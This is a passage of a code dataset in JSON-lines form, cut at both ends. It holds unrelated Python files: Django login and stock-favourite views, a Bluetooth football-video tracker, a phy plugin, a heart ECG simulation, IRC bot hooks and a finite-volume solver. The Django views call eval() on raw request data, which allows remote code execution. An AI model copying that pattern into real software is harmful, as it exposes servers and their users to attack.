JsonResponse(response)\n\n@require_http_methods([\"POST\"])\ndef login(request):\n response = {}\n message = 'success'\n error_num = 0\n\n #get the string\n dic0 = list(request.POST.keys())\n #get the value pair from the string\n dic = eval(dic0[0])\n #print(dic)\n\n username = dic.get('name')\n password = dic.get('password')\n\n #print('user:', username)\n\n try:\n user = User.objects.get(name=username)\n if user.password == hash_code(password):\n request.session['is_login'] = True\n request.session['user_id'] = user.id\n request.session['user_name'] = user.name\n\n #print(request.COOKIES.get(\"csrftoken\"))\n\n response['user_id'] = user.id\n response['user_name'] = user.name\n response['is_login'] = True\n #response['stocks'] = user.stocks\n #selectedStocks = user.stocks.split()\n\n message = 'success'\n error_num = 0\n else:\n message = '密码不正确!'\n error_num = 1\n except :\n message = '用户不存在!'\n error_num = 1\n\n response['msg'] = message\n response['error_num'] = error_num\n return JsonResponse(response)\n\n@require_http_methods([\"POST\"])\ndef logout(request):\n response = {}\n message = 'success'\n error_num = 0\n\n try:\n request.session.flush()\n except Exception as e:\n message = str(e)\n error_num = 1\n\n response['msg'] = message\n response['error_num'] = error_num\n return JsonResponse(response)\n\n@require_http_methods([\"POST\"])\ndef save_selected(request):\n response = {}\n selectedStocks = []\n\n isLogin = False\n #verify if is a valid user\n try:\n username = request.COOKIES[\"user_name\"]\n isLogin = request.COOKIES[\"is_login\"]\n except Exception as e:\n response['msg'] = 'Not a valid user'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n\n if not (isLogin and (request.session[\"user_name\"] == username)):\n response['msg'] = 'session is closed'\n response['error_num'] = 1001\n return JsonResponse(response)\n\n #get the data\n dic0 = list(request.POST.keys())\n #get the value pair from the string\n dic = eval(dic0[0])\n #print(dic)\n\n symbol = dic.get('symbol')\n selected = dic.get('selected')\n\n print(\"symbol:\" + symbol + \" select:\" + selected)\n\n #获取自选股信息\n try:\n user = User.objects.get(name=username)\n str1= user.stocks\n selectedStocks = str1.split(';')\n\n if selected == \"true\":\n if len(selectedStocks) >= 20:\n response['msg'] = 'The maxium number of favorite stocks is 20'\n response['error_num'] = 1001\n return JsonResponse(response)\n else:\n selectedStocks.append(symbol)\n else:\n selectedStocks.remove(symbol)\n\n #print(\"s2:\", selectedStocks)\n\n selectedstr = \";\".join(selectedStocks)\n user.stocks = selectedstr\n user.save()\n\n except Exception as e:\n response['msg'] = 'Save favorite failed'\n response['error_num'] = 1001\n print(str(e))\n return JsonResponse(response)\n\n response['msg'] = 'success'\n response['error_num'] = 0\n return JsonResponse(response)\n","sub_path":"server/stocks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131683470","text":"import os\nimport cv2\nimport numpy as np\nimport bluetooth as bt\nimport logging\nimport time\n\n\ndef find_nearest_player(frm, ball_x, ball_y, team_color, plain):\n imgHSV = cv2.cvtColor(frm, cv2.COLOR_BGR2HSV_FULL)\n lower = np.array(team_color[0:3])\n upper = np.array(team_color[3:6])\n mask = cv2.inRange(imgHSV, lower, upper)\n kernel = np.ones((5, 5), np.uint8)\n mask = cv2.dilate(mask, kernel, iterations=1)\n mask = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n\n if plain == 1:\n lower_parameter = 233\n upper_parameter = 1300\n else:\n lower_parameter = 150\n upper_parameter = 517\n\n contours, hierarchy = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n distance_to_the_ball = []\n for cnt in contours:\n area = cv2.contourArea(cnt)\n arcLength = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.02 * arcLength, True)\n if lower_parameter < area < upper_parameter:\n x, y, w, h = cv2.boundingRect(approx)\n distance_to_the_ball.append(np.sqrt(np.power(ball_x - x, 2) + np.power(ball_y - y, 2)))\n if distance_to_the_ball:\n min_distance = min(distance_to_the_ball)\n return min_distance\n else:\n return -1\n\n\ndef detect_lines(frm, my_color):\n imgHSV = cv2.cvtColor(frm, cv2.COLOR_BGR2HSV_FULL)\n lower = np.array(my_color[0:3])\n upper = np.array(my_color[3:6])\n mask = cv2.inRange(imgHSV, lower, upper)\n edges = cv2.Canny(mask, 50, 50)\n\n rho = 1 # check every 1 pixel\n theta = np.pi / 180 # check every degree\n threshold = 15 # minimum number of intersections to decide that is line\n min_line_length = 50 # minimum number of pixels making up a line\n max_line_gap = 20 # maximum gap in pixels between connectable line segments\n\n # Run Hough on edge detected image\n # Output \"lines\" is an array containing endpoints of detected line segments\n lines = cv2.HoughLinesP(edges, rho, theta, threshold, np.array([]),\n min_line_length, max_line_gap)\n\n middle_line = [0, 0, 0, 0]\n side_line = [0, 0, 0, 0]\n another_lines = []\n print(\"lines\")\n if lines is not None:\n for line in lines:\n line_detect = False\n for x1, y1, x2, y2 in line:\n length = np.sqrt(np.power(x2 - x1, 2) + np.power(y2 - y1, 2))\n if length > 400:\n if (370 < x1 < 830 or 370 < x2 < 830) and (\n abs(x2 - x1) < abs(y2 - y1)): # zawężenie obszaru linii środkowej, eliminacja pasków\n middle_line = [x1, y1, x2, y2]\n print(\"middle\")\n line_detect = True\n if abs(x2 - x1) > abs(y2 - y1) and length > 770:\n side_line = [x1, y1, x2, y2]\n print(\"side\")\n line_detect = True\n if not line_detect:\n print(\"another\")\n another_line = [x1, y1, x2, y2]\n another_lines.append(another_line)\n print(length, x1, y1, x2, y2)\n middle_line_detect = middle_line[0] + middle_line[1] + middle_line[2] + middle_line[3]\n side_line_detect = side_line[0] + side_line[1] + side_line[2] + side_line[3]\n if middle_line_detect != 0 and side_line_detect != 0:\n return 4, middle_line, side_line\n elif middle_line_detect != 0:\n return 1, middle_line, [0, 0, 0, 0]\n elif side_line_detect:\n return 2, [0, 0, 0, 0], side_line\n elif another_lines:\n return 3, another_lines, [0, 0, 0, 0]\n else:\n return 0, [0, 0, 0, 0], [0, 0, 0, 0]\n\n\ndef which_side(ball_x, ball_y, situation, position_side,\n position_zone): # -1 - left 0 - undef 1 - right # -1 - down 0 - center 1 - up\n horizontal = 0\n vertical = 0\n if situation == 1 or situation == 4: # middle_line detected\n if ball_x > position_side[0] and ball_x > position_side[2]:\n horizontal = 1\n elif ball_x < position_side[0] and ball_x < position_side[2]:\n horizontal = -1\n elif position_side[0] > position_side[2] and ball_x > position_side[2]:\n horizontal = 1\n elif position_side[2] > position_side[0] and ball_x > position_side[0]:\n horizontal = 1\n else:\n horizontal = -1\n if situation == 2 or situation == 4: # side_line detected\n if ball_y > position_zone[1] and ball_y > position_zone[3]:\n vertical = 1\n elif ball_y < position_zone[1] and ball_y < position_zone[3]:\n vertical = -1\n elif ball_y < 400:\n vertical = 1\n else:\n vertical = -1\n return horizontal, vertical\n\n\ndef find_ball(frm, my_color, previous_position):\n img_hsv = cv2.cvtColor(frm, cv2.COLOR_BGR2HSV_FULL)\n lower = np.array(my_color[0:3])\n upper = np.array(my_color[3:6])\n mask = cv2.inRange(img_hsv, lower, upper)\n kernel = np.ones((3, 3), np.uint8)\n mask = cv2.bitwise_not(mask)\n mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)\n mask = cv2.dilate(mask, kernel, iterations=1)\n canny_frame = cv2.Canny(mask, 50, 50)\n contours, hierarchy = cv2.findContours(canny_frame, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n number_of_ball_position = 0\n list_of_position = []\n for cnt in contours:\n area = cv2.contourArea(cnt)\n arc_length = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.02 * arc_length, True)\n if 87 < area < 200 and arc_length <= 42.97:\n x, y, w, h = cv2.boundingRect(approx)\n number_of_ball_position = number_of_ball_position + 1\n list_of_position.append([x, y, w, h])\n\n if previous_position[0] == 0:\n if number_of_ball_position == 0:\n return [0, 0, 0, 0]\n else: # return first searched position\n return list_of_position[0]\n else:\n if number_of_ball_position == 0:\n return [0, 0, 0, 0]\n elif number_of_ball_position == 1:\n return list_of_position[0]\n else:\n actual_pos = 0\n prev_x = previous_position[0] + previous_position[2] / 2\n prev_y = previous_position[1] + previous_position[3] / 2\n x_pos = list_of_position[0][0] + list_of_position[0][2] / 2\n y_pos = list_of_position[0][1] + list_of_position[0][3] / 2\n smallest_difference = abs(prev_x - x_pos) + abs(prev_y - y_pos)\n for i, pos in enumerate(list_of_position[1:]):\n x_pos = pos[0] + pos[2] / 2\n y_pos = pos[1] + pos[3] / 2\n difference = abs(prev_x - x_pos) + abs(prev_y - y_pos)\n if difference < smallest_difference:\n smallest_difference = difference\n actual_pos = i\n return list_of_position[actual_pos]\n\n\ndef confirm(sock, status):\n if status:\n sock.send(\"1\".encode(\"utf_8\"))\n print(\"correct\")\n else:\n sock.send(\"0\".encode(\"utf_8\"))\n print(\"error\")\n\n\ndef bluetooth_communication(sock):\n my_colors = []\n data = []\n plain = []\n is_plain_color_write = False\n while True:\n try:\n if len(my_colors) >= 2 and is_plain_color_write is False:\n d = sock.recv(3).decode(\"utf_8\")\n print(\"d plain_color\", int(d))\n plain.append(int(d))\n print(\"plain_color\", plain)\n if d is None:\n confirm(sock, False)\n plain.clear()\n else:\n confirm(sock, True)\n is_plain_color_write = True\n d = sock.recv(3).decode(\"utf_8\")\n print(\"d\", int(d))\n if d is None:\n confirm(sock, False)\n else:\n confirm(sock, True)\n data.append(int(d))\n if len(data) > 5:\n print(\"Received\", data)\n my_colors.append(data)\n print(\"my_colors\", my_colors, len(my_colors))\n confirm(sock, True)\n data = []\n is_plain_color_write = False\n if len(my_colors) > 3:\n break\n except OSError:\n pass\n\n print(\"my_colors\", my_colors)\n print(\"plain_color\", plain)\n\n print(\"Receiving video\")\n if os.path.isfile(\"match_video.mp4\"):\n os.remove(\"match_video.mp4\")\n f = open(\"match_video.mp4\", \"wb\")\n while True:\n try:\n sock.settimeout(20)\n d = sock.recv(10).decode(\"utf_8\")\n if d is None:\n confirm(sock, False)\n elif int(d) < 2:\n confirm(sock, False)\n else:\n confirm(sock, True)\n print(\"video d length\", int(d))\n all_bytes = int(d)\n read_bytes = all_bytes\n sock.recv(10).decode(\"utf_8\")\n while read_bytes > 0:\n amount_of_bytes = min(1024, read_bytes)\n b = sock.recv(amount_of_bytes)\n if not b:\n break\n if b is None:\n confirm(sock, False)\n else:\n confirm(sock, True)\n print(\"video d\", str(b), len(b), int((1 - read_bytes / all_bytes) * 100), read_bytes, all_bytes)\n f.write(b)\n print(\"len decode\", len(b))\n read_bytes = read_bytes - len(b)\n f.close()\n break\n except OSError as e:\n logger.error(str(e), exc_info=True)\n f.close()\n sock.send(\"3\".encode(\"utf_8\"))\n break\n except ValueError:\n pass\n print(\"Receive video\")\n\n return my_colors, plain\n\n\ndef send_results(ball_lost, sock):\n length = str(len(ball_lost) * 3).encode(\"utf_8\")\n print(len(ball_lost))\n print(length)\n sent = False\n while not sent:\n sock.send(length)\n sent = response(sock)\n\n print(ball_lost)\n for i in ball_lost:\n print(\"i\", i)\n for value in i:\n sent = False\n while not sent:\n sock.send(str(value).encode(\"utf_8\"))\n print(value)\n sent = response(sock)\n\n\ndef response(sock):\n r = None\n t1 = time.time()\n while r is None:\n if time.time() - t1 > 10:\n break\n r = sock.recv(1).decode(\"utf_8\")\n if r == \"1\":\n return True\n else:\n return False\n\n\ndef ready(sock):\n sent = False\n while not sent:\n sock.send(\"2\".encode(\"utf_8\"))\n sent = response(sock)\n\n\nserver_sock = bt.BluetoothSocket(bt.RFCOMM)\nserver_sock.bind((\"\", bt.PORT_ANY))\nserver_sock.listen(1)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\nport = server_sock.getsockname()[1]\n\nuuid = \"58723436-5452-11eb-ae93-0242ac130002\"\n\nbt.advertise_service(server_sock, \"SampleServer\", service_id=uuid,\n service_classes=[uuid, bt.SERIAL_PORT_CLASS],\n profiles=[bt.SERIAL_PORT_PROFILE],\n )\nwhile True:\n print(\"Waiting for connection on RFCOMM channel\", port)\n\n client_sock, client_info = server_sock.accept()\n print(\"Accepted connection from\", client_info)\n\n colors, plain_color = bluetooth_communication(client_sock)\n path = 'match_video2.mp4'\n video = cv2.VideoCapture(path)\n\n FrameCount = 0\n position = [0, 0, 0, 0]\n actual_side = 0 # 1 - left, 0 - undef, -1 - right\n actual_zone = 0 # 1 - up 0 - central -1 - down\n up = 0\n central = 0\n down = 0\n line_detected = 0\n first_team_at_the_ball = 0\n second_team_at_the_ball = 0\n actual_zone_after_voting = 0\n actual_team_at_the_ball = 0\n ball_lost1 = []\n ball_lost2 = []\n\n colors = [[56, 97, 20, 86, 182, 255],\n [56, 14, 96, 156, 116, 255],\n [237, 111, 68, 265, 255, 255],\n [0, 180, 90, 25, 228, 255]] # FM1\n # colors = [[46, 87, 76, 91, 180, 255],\n # [65, 0, 71, 184, 111, 255],\n # [224, 50, 2, 272, 225, 255],\n # [60, 0, 63, 214, 83, 255]] # FM2\n # colors = [[52, 126, 47, 65, 197, 127],\n # [65, 14, 84, 172, 126, 255],\n # [239, 64, 105, 271, 255, 255],\n # [234, 74, 102, 268, 255, 241]] # FM3\n # colors = [[44, 150, 105, 66, 238, 170],\n # [51, 34, 173, 83, 143, 245],\n # [36, 96, 200, 51, 145, 255],\n # [0, 0, 0, 37, 232, 255]] # real_video\n # pitch color, lines color, 1st team color, 2nd team color\n plain_color = [0, 1] # FM1\n # plain_color = [0, 1] # FM2\n # plain_color = [1, 0] # FM3\n # plain_color = [0, 1] # real_video\n # the same color of T-shirts and shorts\n\n while True:\n\n FrameCount = FrameCount + 1\n ret, frame = video.read()\n if frame is None:\n print(\"ball_lost1\", ball_lost1)\n print(\"ball_lost2\", ball_lost2)\n break\n frame = cv2.resize(frame, (1200, 800))\n\n print(\"frame_count\", FrameCount)\n position = find_ball(frame, colors[0], position)\n\n if FrameCount % 30 == 0:\n\n if first_team_at_the_ball > second_team_at_the_ball:\n if actual_team_at_the_ball == -1:\n ball_lost2.append([actual_zone_after_voting, actual_side, int(round(FrameCount / 30))])\n print(\"First team at the ball\")\n actual_team_at_the_ball = 1\n elif first_team_at_the_ball < second_team_at_the_ball:\n if actual_team_at_the_ball == 1:\n ball_lost1.append([actual_zone_after_voting, actual_side, int(round(FrameCount / 30))])\n print(\"Second team at the ball\")\n actual_team_at_the_ball = -1\n elif actual_team_at_the_ball == 1:\n print(\"First team at the ball\")\n elif actual_team_at_the_ball == -1:\n print(\"Second team at the ball\")\n else:\n print(\"Undef\")\n\n if actual_side == -1:\n print(\"left\")\n elif actual_side == 1:\n print(\"right\")\n else: # actual side = 0\n print(\"undef\")\n if up >= central and up > down:\n print(\"up\")\n actual_zone_after_voting = 1\n elif down >= central and down > up:\n print(\"down\")\n actual_zone_after_voting = -1\n else:\n if line_detected == 1: # some line detected\n print(\"central\")\n actual_zone_after_voting = 0\n else:\n if actual_zone_after_voting == 1:\n print(\"up\")\n elif actual_zone_after_voting == -1:\n print(\"down\")\n else:\n print(\"central\")\n up = 0\n down = 0\n central = 0\n line_detected = 0\n first_team_at_the_ball = 0\n second_team_at_the_ball = 0\n\n if position[0] + position[1] + position[2] + position[3] != 0:\n print(\"pilka\", position)\n line_situation, line_position_side, line_position_zone = detect_lines(frame, colors[1])\n\n if line_situation != 0:\n\n line_detected = 1\n hor, ver = which_side(position[0], position[1], line_situation, line_position_side, line_position_zone)\n if hor != 0:\n actual_side = hor\n if actual_side == -1:\n print(\"left\")\n if actual_side == 1:\n print(\"right\")\n if actual_side == 0:\n print(\"undef\")\n\n actual_zone = ver\n if actual_zone == -1:\n down = down + 1\n print(\"down\", down)\n if actual_zone == 1:\n up = up + 1\n print(\"up\", up)\n if actual_zone == 0:\n central = central + 1\n print(\"central\", central)\n\n nearest_player_first_team = find_nearest_player(frame, position[0], position[1], colors[2],\n plain_color[0])\n nearest_player_second_team = find_nearest_player(frame, position[0], position[1], colors[3],\n plain_color[1])\n\n if (nearest_player_first_team != -1 or nearest_player_second_team != -1) and (\n nearest_player_first_team < 50 or nearest_player_second_team < 50):\n string1 = \" 1 \" + str(nearest_player_first_team)\n print(string1)\n string2 = \" 2 \" + str(nearest_player_second_team)\n print(string2)\n if nearest_player_first_team < nearest_player_second_team: # distance from ball\n first_team_at_the_ball = first_team_at_the_ball + 1\n print(first_team_at_the_ball)\n else:\n second_team_at_the_ball = second_team_at_the_ball + 1\n print(second_team_at_the_ball)\n key = cv2.waitKey(5) & 0xFF\n if key == ord('q'):\n break\n\n ready(client_sock)\n print(\"ready state complete\")\n send_results(ball_lost1, client_sock)\n print(\"send results1 complete\")\n send_results(ball_lost2, client_sock)\n print(\"send results2 complete\")\n\n video.release()\n cv2.destroyAllWindows()\n","sub_path":"OwnTracker.py","file_name":"OwnTracker.py","file_ext":"py","file_size_in_byte":17784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"77656022","text":"\"\"\"CopyTraceView output plugin.\n\nThis plugin adds a shortcut to the trace view to skip through spike pairs\norganized by ISI.\n\nTo activate the plugin, copy this file to `~/.phy/plugins/` and add this line\nto your `~/.phy/phy_config.py`:\n\n```python\nc.TemplateGUI.plugins = ['NexpSpikePairUpdate']\n```\n\nLuke Shaheen - Laboratory of Brain, Hearing and Behavior Jan 2017\n\"\"\"\n\nfrom phy import IPlugin\nfrom phy.gui import Actions\nfrom phy.cluster.views import TraceView\n\nclass CopyTraceView(IPlugin):\n \n def attach_to_controller(self, controller):\n @controller.connect\n def on_gui_ready(gui,**kwargs):\n\n actions = Actions(gui) \n @actions.add(menu='TraceView')\n def CopyTraceView():\n tv = gui.get_view('TraceView')\n m = controller.model \n tv2 = TraceView(traces=tv.traces,\n n_channels=tv.n_channels,\n sample_rate=tv.sample_rate,\n duration=tv.duration,\n channel_vertical_order=m.channel_vertical_order,\n )\n gui.add_view(tv2, name='Trace2View')\n tv2.do_show_labels = tv.do_show_labels\n tv2.set_interval(tv._interval)\n tv2.go_to(tv.time)\n tv2.panzoom.set_pan_zoom(zoom=tv.panzoom._zoom,pan=tv.panzoom._pan)\n# cluster_ids = controller.supervisor.selected\n# if len(cluster_ids) == 0:\n# return\n# elif len(cluster_ids) == 1:\n# is_self=True\n# else:\n# is_self=False\n# try:\n# do_compute = self.current_clusters != cluster_ids\n# except:\n# do_compute=True\n# if do_compute:\n# print('computing spike pairs...')\n# spc = controller.supervisor.clustering.spikes_per_cluster\n# spike_ids = spc[cluster_ids[0]]\n# spike_times1 = m.spike_times[spike_ids] \n# if is_self:\n# diffs=np.diff(spike_times1)\n# else:\n# spike_ids = spc[cluster_ids[1]]\n# spike_times2 = m.spike_times[spike_ids]\n# diffs=np.repeat(spike_times1[:,None],spike_times2.shape,axis=1)-np.repeat(spike_times2[:,None],spike_times1.shape,axis=1).T\n# self.max_num=np.min((np.prod(diffs.shape),max_num))\n# self.order=np.argsort(np.absolute(diffs),axis=None)[:self.max_num] \n# if is_self:\n# self.times=(spike_times1[self.order]+spike_times1[self.order+1])/2\n# else:\n# indexes = np.unravel_index(self.order,diffs.shape)\n# self.times=(spike_times1[indexes[0]]+spike_times2[indexes[1]])/2\n# self.current_index=0\n# self.current_clusters=cluster_ids\n# print('done')\n# else:\n# self.current_index += increment\n# if self.current_index == max_num:\n# self.current_index=0\n# elif self.current_index < 0:\n# self.current_index=self.max_num-1\n# tv.go_to(self.times[self.current_index])\n\n","sub_path":"phycontrib/LBHB_plugins/CopyTraceView.py","file_name":"CopyTraceView.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"173999714","text":"\"\"\"\nDecide on the delta/nu ranges before running this. Will get a series of questions stating parameters.\nRight now parameters such as system size and rp are not currently saved so make a note of them.\n\nYou will need to install h5py. A good package which has a lot of useful modules for data science is anaconda.\n\"\"\"\n\nimport propagate_singlesource as fp\nimport analysis_theano as at\nfrom itertools import product\nimport numpy as np\nimport h5py\nimport time\n# import matplotlib.pyplot as plt\n\n\nIterations = int(input(\"Number of iterations: \"))\n\ndef convert(data, output):\n\n for index_data in data:\n grid[(grid > 0) & (grid <= 50)] -= 1\n if index_data == []: # could use but this is more readable.\n current_state = grid.copy()\n output.append(current_state)\n else:\n indices = np.unravel_index(index_data, a.shape)\n for ind in range(len(indices[0])):\n grid[indices[0][ind]][indices[1][ind]] = 50\n current_state = grid.copy()\n output.append(current_state)\n\n return output\n\ne = at.ECG(shape=(200, 200), probe_height=3) # Assuming shape/probe height doesn't change.\nfile_name = input(\"Name of output file: \")\nprint(\"Nu Value:\")\nnu = float(input())\n\nh5f = h5py.File('%s.h5' % file_name, 'w')\nfor index in range(Iterations):\n start_time1 = time.time()\n index_grp = h5f.create_group('Index: %s' % index)\n\n a = fp.Heart(nu = nu, fakedata=True)\n rand_true = True\n while rand_true:\n crit_position = np.random.randint(0,40000,2)\n y_rand,x_rand = np.unravel_index(crit_position,(200,200))\n if (((y_rand[1] - y_rand[0]) ** 2) + ((x_rand[1] - x_rand[0]) ** 2)) ** 0.5 > 50.:\n rand_true = False\n\n a.set_pulse(60,[[y_rand],[x_rand]])\n raw_data = a.propagate(960)\n converted_data = list()\n grid = np.zeros(a.shape)\n convert(raw_data, converted_data)\n\n # Saving the critical circuit position\n index_grp.create_dataset('Crit Position', data=crit_position)\n ecg = e.solve(converted_data[661:])\n\n index_grp.create_dataset('ECG', data=ecg)\n index_grp.create_dataset('Probe Positions', data=e.probe_position)\n print(\"--- Iteration %s: %s seconds ---\" % (index, time.time() - start_time1))\n\nh5f.close()\n","sub_path":"simulate_doublesource.py","file_name":"simulate_doublesource.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65481940","text":"from motobot import hook, IRCLevel, command\n\n\n@command('levelprobe')\ndef levelprobe_command(bot, nick, channel, message, args):\n try:\n mapping = {\n IRCLevel.user: 'has nothing',\n IRCLevel.voice: 'has a voice',\n IRCLevel.hop: 'has a half-op',\n IRCLevel.aop: 'has an ops',\n IRCLevel.sop: 'has a protected ops',\n IRCLevel.owner: 'is the owner',\n IRCLevel.master: 'is a muthafuckin\\' master'\n }\n return \"{} {} in this channel.\".format(args[1], mapping[bot.get_userlevel(channel, args[1])])\n except IndexError:\n return \"Please supply a valid user to probe.\"\n except KeyError:\n return \"Please supply a user who is actually in this channel.\"\n\n\n@hook('353')\ndef handle_names(bot, message):\n \"\"\" Parse the name command and record the userlevels of users. \"\"\"\n channel = message.params[2]\n names = message.params[-1].split(' ')\n for name in names:\n handle_name(bot, channel, name)\n\n\ndef handle_name(bot, channel, name):\n \"\"\" Handle a single name from the name command. \"\"\"\n userlevels, nick = get_userlevels(name)\n bot.userlevels[(channel, nick)] = userlevels\n\n\ndef get_userlevels(name):\n \"\"\" Get the userlevel from a nick and return the userlevel and nick. \"\"\"\n mapping = {\n '+': IRCLevel.voice,\n '%': IRCLevel.hop,\n '@': IRCLevel.aop,\n '&': IRCLevel.sop,\n '~': IRCLevel.owner\n }\n userlevels = [IRCLevel.user]\n\n for i in range(len(name)):\n if name[i] in mapping:\n userlevels.append(mapping[name[i]])\n else:\n return userlevels, name[i:]\n\n\n@hook('JOIN')\ndef handle_join(bot, message):\n \"\"\" Handle the join of a user. \"\"\"\n channel = message.params[0]\n bot.userlevels[(channel, message.nick)] = [IRCLevel.user]\n\n\n@hook('NICK')\ndef handle_nick(bot, message):\n \"\"\" Handle the nick change of a user. \"\"\"\n old_nick = message.nick\n new_nick = message.params[0]\n\n for channel, nick in bot.userlevels:\n if nick == old_nick:\n bot.userlevels[(channel, new_nick)] = \\\n bot.userlevels.pop((channel, nick))\n\n\n@hook('MODE')\ndef handle_mode(bot, message):\n \"\"\" Handle the mode command and update userlevels accordingly. \"\"\"\n mapping = {\n 'v': IRCLevel.voice,\n 'h': IRCLevel.hop,\n 'o': IRCLevel.aop,\n 'a': IRCLevel.sop,\n 'q': IRCLevel.owner\n }\n channel = message.params[0]\n nicks = message.params[2:]\n add = True if message.params[1][0] == '+' else False\n modes = message.params[1][1:]\n\n for nick, mode in zip(nicks, modes):\n if mode in mapping:\n level = mapping[mode]\n userlevels = bot.userlevels[(channel, nick)]\n if add:\n userlevels.append(level)\n else:\n userlevels = [x for x in userlevels if x != level]\n bot.userlevels[(channel, nick)] = userlevels\n\n\n@hook('PART')\ndef handle_part(bot, message):\n \"\"\" Handle the part of a user. \"\"\"\n channel = message.params[0]\n bot.userlevels.pop((channel, message.nick))\n\n\n@hook('KICK')\ndef handle_kick(bot, message):\n \"\"\" Handle the kick of a user. \"\"\"\n nick = message.params[1]\n channel = message.params[0]\n bot.userlevels.pop((channel, nick))\n\n\n@hook('QUIT')\ndef handle_quit(bot, message):\n \"\"\" Handle the quit of a user. \"\"\"\n remove = []\n for channel, nick in bot.userlevels:\n if nick == message.nick:\n remove.append((channel, nick))\n for pair in remove:\n bot.userlevels.pop(pair)\n","sub_path":"motobot/core_plugins/userlist_handlers.py","file_name":"userlist_handlers.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"39631137","text":"\"\"\"\nCopyright 2021 Mohamed Khalil\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport os\nos.environ['NUMPY_EXPERIMENTAL_ARRAY_FUNCTION'] = '0'\n\nimport numpy as np\nfrom abc import abstractmethod\n\nfrom pyHype.limiters import limiters\nfrom pyHype.states.states import ConservativeState\nfrom pyHype.flux.Roe import ROE_FLUX_X\nfrom pyHype.flux.HLLE import HLLE_FLUX_X, HLLE_FLUX_Y\nfrom pyHype.flux.HLLL import HLLL_FLUX_X, HLLL_FLUX_Y\nimport pyHype.fvm.Gradients as Grads\nimport pyHype.utils.utils as utils\n\n\n__DEFINED_FLUX_FUNCTIONS__ = ['Roe', 'HLLE', 'HLLL']\n__DEFINED_SLOPE_LIMITERS__ = ['VanAlbada', 'VanLeer', 'Venkatakrishnan', 'BarthJespersen']\n__DEFINED_GRADIENT_FUNCS__ = ['GreenGauss']\n__DEFINED_RECONSTRUCTION__ = ['Primitive', 'Conservative']\n\n\nclass MUSCLFiniteVolumeMethod:\n def __init__(self,\n inputs,\n global_nBLK: int\n ) -> None:\n \"\"\"\n Solves the euler equations using a MUSCL-type finite volume scheme.\n\n TODO:\n ------ DESCRIBE MUSCL BRIEFLY ------\n\n The matrix structure used for storing solution data in various State classes is a (ny * nx * 4) numpy ndarray\n which has planar dimentions equal to the number of cells in the y and x direction, and a depth of 4. The\n structure looks as follows:\n\n ___________________nx____________________\n v v\n |> O----------O----------O----------O----------O ........................ q0 (zeroth state variable)\n | | | | | |\\\n | | | | | |-O ...................... q1 (first state variable)\n | | | | | | |\\\n | O----------O----------O----------O----------O |-O .................... q2 (second state variable)\n | | | | | |\\| |\\\n | | | | | |-O |-O .................. q3 (third state variable)\n | | | | | | |\\| |\n ny O----------O----------O----------O----------O |-O |\n | | | | | |\\| |\\|\n | | | | | |-O |-O\n | | | | | | |\\| |\n | O----------O----------O----------O----------O |-O |\n | | | | | |\\| |\\|\n | | | | | |-O | O\n | | | | | | |\\| |\n |> O----------O----------O----------O----------O |-O |\n \\| \\| \\| \\| \\| |\\|\n O----------O----------O----------O----------O |-O\n \\| \\| \\| \\| \\| |\n O----------O----------O----------O----------O |\n \\| \\| \\| \\| \\|\n O----------O----------O----------O----------O\n\n\n then, cells are constructed as follows:\n\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | .....x..... | | -- Y+1/2\n | | . | . | |\n O---------O----x--- C ---x----O---------O -- Y\n | | . | . | |\n | | .....x..... | | -- Y-1/2\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | |\n X-1/2 X X+1/2\n\n Reduction to 1D problem for each cell:\n\n x - direction:\n\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n | | | | |\n O---------O---------O---------O---------O\n | | | | |\n | | | | |\n ..|.........|.........|.........|.........|..\n . O----x----O----x--- C ---x----O----x----0 .\n ..|.........|.........|.........|.........|..\n | | | | |\n | | | | |\n O---------O---------O---------O---------0\n\n y - direction:\n . . .\n O---------O-------.-O-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-O-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-C-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-O-.-------O---------O\n | | . | . | |\n | | . x . | |\n | | . | . | |\n O---------O-------.-O-.-------O---------O\n . . .\n \"\"\"\n\n # Set x and y direction number of points\n self.nx = inputs.nx\n self.ny = inputs.ny\n\n # Set inputs\n self.inputs = inputs\n\n # Set global block number\n self.global_nBLK = global_nBLK\n\n # Initialize x and y direction flux\n self.Flux_E = np.empty((self.ny, self.nx, 4))\n self.Flux_W = np.empty((self.ny, self.nx, 4))\n self.Flux_N = np.empty((self.ny, self.nx, 4))\n self.Flux_S = np.empty((self.ny, self.nx, 4))\n\n # Initialize left and right conservative states\n self.UL = ConservativeState(self.inputs, nx=self.nx + 1, ny=1)\n self.UR = 